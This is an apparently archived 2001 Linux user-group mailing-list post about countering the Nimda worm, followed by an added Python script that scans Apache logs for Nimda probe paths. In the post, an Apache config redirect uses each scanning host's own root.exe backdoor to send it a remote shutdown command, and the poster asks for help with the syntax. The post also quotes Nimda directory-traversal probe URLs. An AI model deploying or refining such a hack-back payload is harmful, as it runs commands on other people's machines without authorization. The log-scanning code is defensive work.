[NTLUG:Discuss] Possible new nimda counter-attack.
Richard Geoffrion
ntlug at rain.lewisville.tx.us
Wed Oct 10 11:25:25 CDT 2001
While researching possible means to counter-attack this dang microsoft.nimda
virus, I discovered that:
a) I can't use high ASCII characters in Linux directory names.
b) I can't create a wildcard directory on the reiserfs that would accept
input from any md command
(i.e. mkdir * would then be accessible by cd wombat or cd nonimda -OR-
in this case "cd scripts").
But I DID discover something... EXTERNAL REDIRECTS! I tested this and
redirected the URL
http://rain.lewisville.tx.us/scripts/..%5c../winnt/system32/cmd.exe straight
to yahoo.com! Now of course I don't want to go around sending people to
other websites... hm... just had a thought! Maybe I DO want to redirect
them somewhere!?!? Maybe I could redirect them to the BIGGEST webpage that
Microsoft has published... anybody know of a good one?
But I digress...
Here is what I added to my httpd.conf file.
# External Redirect of a nimda scan
<Location /scripts/*/winnt/system32/*>
Deny from all
ErrorDocument 403
http://"$REMOTE_ADDR/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWind
owsEx+5", "r"
# ErrorDocument 403 http://www.yahoo.com
</Location>
Since I know that this redirect in and of itself works, my question has to
do with the syntax of the http string. Can anyone tell me if this is
correct or help me with the syntax? I only want to do my part!
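The post's <Location> block denies the Nimda scan paths with a 403, so the only trace of a probe is the access log line. Below is an added example (written for this archive, not code from the poster or from Apache) that reads Apache combined-format log lines, percent-decodes the request path the way the scans are encoded (the ..%5c in the URL above is a backslash, and some variants double-encode it as ..%255c), and counts per source address how many probes arrived and how many were actually served rather than denied. The log lines, the IP addresses and the PROBE_MARKERS list are constructed for the example; the two path markers are the cmd.exe and root.exe requests quoted in the post.

```python
import re
from urllib.parse import unquote

# Fields we need from an Apache "combined" log line (constructed regex).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Request paths the scan in the post asks for, after decoding and after
# folding backslashes into forward slashes (hypothetical list, extend as needed).
PROBE_MARKERS = ("/winnt/system32/cmd.exe", "/scripts/root.exe")

# Constructed sample log lines: two denied probes from one host, one probe
# that was served (200) from another, and one ordinary request.
SAMPLE_LOG = [
    '10.0.0.7 - - [10/Oct/2001:11:20:01 -0500] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 271',
    '10.0.0.7 - - [10/Oct/2001:11:20:02 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 271',
    '10.0.0.9 - - [10/Oct/2001:11:21:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1020',
    '192.168.1.5 - - [10/Oct/2001:11:22:30 -0500] "GET /index.html HTTP/1.1" 200 4523',
]


def normalise_path(raw: str) -> str:
    """Percent-decode twice (scans may double-encode ..%5c as ..%255c) and
    turn backslashes into slashes so every traversal spelling looks alike."""
    decoded = unquote(unquote(raw))
    return decoded.replace("\\", "/").lower()


def is_nimda_probe(raw_path: str) -> bool:
    """True if the decoded request path reaches one of the probed executables."""
    path = normalise_path(raw_path)
    return any(marker in path for marker in PROBE_MARKERS)


def scan_log(lines):
    """Return {ip: {"probes": n, "served": m}}; 'served' counts probes that
    got a 2xx answer, i.e. requests the Deny rule did not stop."""
    hits = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_nimda_probe(m.group("path")):
            continue
        rec = hits.setdefault(m.group("ip"), {"probes": 0, "served": 0})
        rec["probes"] += 1
        if m.group("status").startswith("2"):
            rec["served"] += 1
    return hits


if __name__ == "__main__":
    for ip, rec in scan_log(SAMPLE_LOG).items():
        print(f"{ip}: {rec['probes']} probe(s), {rec['served']} served")
```

Any address with served > 0 means a probe got past the <Location> rule (for instance an encoding the pattern did not cover), which is the case worth looking at; feed it your real access_log instead of SAMPLE_LOG.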